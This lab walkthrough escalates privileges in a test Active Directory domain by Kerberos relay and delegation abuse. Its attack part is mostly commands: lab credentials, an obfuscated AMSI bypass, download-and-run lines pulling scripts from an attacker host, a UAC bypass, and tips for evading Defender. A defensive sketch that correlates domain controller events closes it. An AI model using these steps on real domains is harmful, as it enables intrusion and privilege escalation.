# KrbRelay Up - Linux

* Another very useful technique to escalate privileges is Kerberos relay, as implemented in [KrbRelayUp](https://github.com/Dec0ne/KrbRelayUp)
* As KrbRelayUp is detected by Defender, we will use the step-by-step approach from [this writeup](https://gist.github.com/tothi/bf6c59d6de5d0c9710f23dae5750c4b9) by @an0n\_r0, using @cube0x0's [KrbRelay](https://github.com/cube0x0/KrbRelay)
* At the time of writing, KrbRelay is not detected by Defender.
* The condition for this privesc is that LDAP signing is NOT enforced on the DC; we can check that with the cme ldap-signing module:

```
crackmapexec ldap 192.168.56.10-12 -u elena.lopez -p princesa1 -d north.newyork.local -M ldap-signing
```

<figure><img src="https://755243087-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FB2Dm6vWGbM7kQRITOyVl%2Fuploads%2FpuM9BDrhkUhrLYZFtmQ3%2Fimage.png?alt=media&#x26;token=13d0ef38-7581-49e0-84b7-5257a4bb0834" alt=""><figcaption></figcaption></figure>

**Add computer and RBCD**

* To exploit KrbRelay by adding a computer, the user must be allowed to add new computer accounts to the domain (MachineAccountQuota greater than 0); we can check that with the cme MAQ module:

```
crackmapexec ldap 192.168.56.11 -u elena.lopez -p princesa1 -d north.newyork.local -M MAQ
```

<figure><img src="https://755243087-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FB2Dm6vWGbM7kQRITOyVl%2Fuploads%2FrTQpCcxGu6wejtNaEAEf%2Fimage.png?alt=media&#x26;token=8c2d2687-35af-4059-9031-90e986fc309c" alt=""><figcaption></figcaption></figure>

### Add computer

```
addcomputer.py -computer-name 'krbrelay$' -computer-pass 'ComputerPassword' -dc-host bronx.north.newyork.local -domain-netbios NORTH 'north.newyork.local/pacofish:pacofish'
addcomputer.py -computer-name 'krbrelay$' -computer-pass 'ComputerPassword' -dc-host bronx.north.newyork.local -domain-netbios NORTH 'north.newyork.local/elena.lopez:princesa1'
```

### Get the SID of that computer

#### From Windows

```
$o = ([ADSI]"LDAP://CN=krbrelay,CN=Computers,DC=north,DC=newyork,DC=local").objectSID
(New-Object System.Security.Principal.SecurityIdentifier($o.value, 0)).Value
S-1-5-21-3634065772-4036021599-3644360361-1136
```

#### From Linux

```
lookupsid.py -domain-sids north.newyork.local/elena.lopez:princesa1@192.168.56.10 0
```

```
powershell.exe (New-Object System.Net.WebClient).DownloadFile('http://192.168.56.31:8000/PowerView.ps1', 'C:\Users\Elena.Lopez\Documents\PowerView.ps1')
```

### Check ports

#### RDP to the target (xfreerdp)

```
xfreerdp /u:pacofish /p:pacofish /v:192.168.56.11 /cert-ignore
```

```
PS C:\Users\pacofish\Desktop> .\CheckPort.exe
[*] Looking for available ports..
[*] SYSTEM Is allowed through port 443
```

### Launch krbrelay

CLSID: [`CIeAxiInstallerService Class`](https://strontic.github.io/xcyclopedia/library/clsid_90F18417-F0F1-484E-9D3C-59DCEEE5DBD8.html)

```
PS C:\Users\elena.lopez\Desktop> .\KrbRelay.exe -spn ldap/bronx.north.newyork.local -clsid 90f18417-f0f1-484e-9d3c-59dceee5dbd8 -rbcd S-1-5-21-3634065772-4036021599-3644360361-1136 -port 443
```

<figure><img src="https://755243087-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FB2Dm6vWGbM7kQRITOyVl%2Fuploads%2FglxCjAiqzyeUEQGLl2s8%2Fimage.png?alt=media&#x26;token=52e6d4b1-407e-46fc-b824-21068b55bc46" alt=""><figcaption></figcaption></figure>

### Now we finish with RBCD exploitation

#### From Linux with Impacket

```
getTGT.py -dc-ip 'bronx.north.newyork.local' 'north.newyork.local'/'krbrelay$':'ComputerPassword'
export KRB5CCNAME=/workspace/krbrelay\$.ccache
getST.py -impersonate 'administrator' -spn 'CIFS/yonkers.north.newyork.local' -k -no-pass -dc-ip 'bronx.north.newyork.local' 'north.newyork.local'/'krbrelay$'
export KRB5CCNAME=/workspace/administrator@CIFS_yonkers.north.newyork.local@NORTH.NEWYORK.LOCAL.ccache
wmiexec.py -k @yonkers.north.newyork.local

C:\>whoami
north\administrator
```

<figure><img src="https://755243087-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FB2Dm6vWGbM7kQRITOyVl%2Fuploads%2FjIqDRdr8TompHChFibpb%2Fimage.png?alt=media&#x26;token=2f62db14-47da-4550-8380-d208bf760d82" alt=""><figcaption></figcaption></figure>

#### With Rubeus from Windows

```
$x=[Ref].Assembly.GetType('System.Management.Automation.Am'+'siUt'+'ils');$y=$x.GetField('am'+'siCon'+'text',[Reflection.BindingFlags]'NonPublic,Static');$z=$y.GetValue($null);[Runtime.InteropServices.Marshal]::WriteInt32($z,0x41424344)
iex(new-object system.net.webclient).downloadstring('http://192.168.56.31:8080/amsi_rmouse.txt')
iex(new-object net.webclient).downloadstring('http://192.168.56.31:8080/PowerSharpPack/PowerSharpPack.ps1')
PowerSharpPack -rubeus -Command "hash /password:ComputerPassword"
PowerSharpPack -rubeus -Command "s4u /user:krbrelay$ /rc4:0EDDEDC35EB7B7ECDE0C9F0564E54C83 /impersonateuser:administrator /msdsspn:host/yonkers/ptt"
```

* And, just like in the writeup by @an0n\_r0, we launch [SCMUACBypass.exe](https://gist.github.com/tyranid/c24cfd1bd141d14d4925043ee7e03c82) by Tyranid and get a SYSTEM shell

<figure><img src="https://mayfly277.github.io/assets/blog/GOAD/privesc_withrubeus.png" alt=""><figcaption></figcaption></figure>

Without AV, or if you modify/obfuscate KrbRelayUp, you can do all of this with the following commands:

```
.\KrbRelayUp.exe relay -Domain north.newyork.local -CreateNewComputerAccount -ComputerName evilhost2$ -ComputerPassword pass@123
.\KrbRelayUp.exe spawn -m rbcd -d north.newyork.local -dc bronx.north.newyork.local -cn evilhost2$ -cp pass@123
```

* KrbRelay can also be used to relay to ADCS, or to add msDS-KeyCredentialLink and exploit it with Shadow Credentials. All you need to know is on [this page](https://github.com/Dec0ne/KrbRelayUp); this is left as an exercise for the reader.
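From the defender's side, the chain above leaves three traces in the DC Security log that can be correlated: a regular user creating a computer account (4741, MachineAccountQuota in use), the relayed machine account writing msDS-AllowedToActOnBehalfOfOtherIdentity on its own object (5136), and an S4U2Proxy service ticket whose transited service is the freshly created account (4769). The script below is an added example, not part of the original writeup or of KrbRelay; the events are constructed samples with Windows XML field names, and the provisioning allowlist is an assumption.

```python
"""Correlate DC Security events left by the add-computer + KrbRelay + RBCD chain.
Added detection sketch; SAMPLE_EVENTS are constructed, not real log data."""
from datetime import datetime, timedelta

RBCD_ATTR = "msDS-AllowedToActOnBehalfOfOtherIdentity"
PROVISIONING_ACCOUNTS = {"svc_join"}  # assumption: accounts expected to join machines

SAMPLE_EVENTS = [  # constructed samples, field names mirror the Windows XML schema
    {"EventID": 4741, "Time": "2023-05-01T10:00:05", "SubjectUserName": "elena.lopez",
     "TargetUserName": "krbrelay$"},
    {"EventID": 5136, "Time": "2023-05-01T10:04:40", "SubjectUserName": "YONKERS$",
     "ObjectDN": "CN=YONKERS,OU=Servers,DC=north,DC=newyork,DC=local",
     "AttributeLDAPDisplayName": RBCD_ATTR},
    {"EventID": 4769, "Time": "2023-05-01T10:06:12", "ServiceName": "YONKERS$",
     "TargetUserName": "administrator@NORTH.NEWYORK.LOCAL",
     "TransmittedServices": "krbrelay$@NORTH.NEWYORK.LOCAL"},
]


def _when(ev):
    return datetime.fromisoformat(ev["Time"])


def detect(events, window=timedelta(hours=1)):
    """Return (rule, event) findings in time order; `window` bounds the 4741->4769 link."""
    findings, new_computers = [], {}
    for ev in sorted(events, key=_when):
        eid = ev["EventID"]
        if eid == 4741 and ev["SubjectUserName"].lower() not in PROVISIONING_ACCOUNTS:
            # A plain user creating a machine account: MachineAccountQuota being consumed.
            new_computers[ev["TargetUserName"].lower()] = _when(ev)
            findings.append(("maq_computer_created", ev))
        elif eid == 5136 and ev["AttributeLDAPDisplayName"] == RBCD_ATTR:
            subject = ev["SubjectUserName"].rstrip("$").lower()
            target_cn = ev["ObjectDN"].split(",")[0][len("CN="):].lower()
            # Relayed machine-account auth writes the attribute on the account itself;
            # an admin configuring RBCD on purpose shows up as a user principal instead.
            rule = "rbcd_self_write" if subject == target_cn else "rbcd_written"
            findings.append((rule, ev))
        elif eid == 4769 and ev.get("TransmittedServices"):
            # S4U2Proxy: TargetUserName impersonated towards ServiceName via the transited account.
            proxy = ev["TransmittedServices"].split("@")[0].lower()
            created = new_computers.get(proxy)
            if created is not None and _when(ev) - created <= window:
                findings.append(("s4u2proxy_via_new_computer", ev))
    return findings


if __name__ == "__main__":
    for rule, ev in detect(SAMPLE_EVENTS):
        print(rule, ev["EventID"], ev["Time"])
```

Event 5136 only appears if an object-level SACL (Write Property) is configured on computer objects; without it, the RBCD write leaves no 5136 at all.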

**With other methods**

